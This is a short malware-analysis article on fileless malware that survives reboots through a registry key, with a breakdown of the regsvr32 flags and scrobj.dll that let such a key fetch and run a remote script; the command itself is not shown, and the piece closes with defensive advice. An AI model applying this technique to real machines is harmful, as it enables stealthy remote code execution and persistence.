Fileless malware is becoming more popular in blackhat activities. What was first seen in some sophisticated targeted attacks is now becoming a standard partially due to the Vault 7 leak that revealed CIA’s modus operandi.
There seems to be confusion about the definition of fileless malware so news sites will often say malware is fileless while it’s definitely not fileless. Typically, they are talking about core backdoor sitting on compromised machine which downloads encrypted payload while in memory.
In this article we will look at truly fileless malware that requires no files to survive a reboot. The sample I chose was first analyzed by TrendMicro. The team behind the campaign has put a lot of effort in order to stay under the anti-virus and analyst’s radar.
Method of compromising is unknown because the malware erases all system logs. I suspect that it used some remote code execution vulnerability to create following registry key:
Regsvr32 is Windows command-line utility for registering and unregistering (/u) DLLs
/s = silent option for regsvr32
/n = tells regsvr32 not to use DllRegisterServer
/u = unregister server/object
/i = used for passing an optional parameter (ie. URL) to DLLinstall
scrobj.dll = Microsoft’s Script Component Runtime (this resides on every Windows system)
Fileless malware often abuses Windows built-in functionalities such as Powershell and most people that get compromised don’t even use those functionalities. No matter what operating system you use, consider disabling services you don’t need.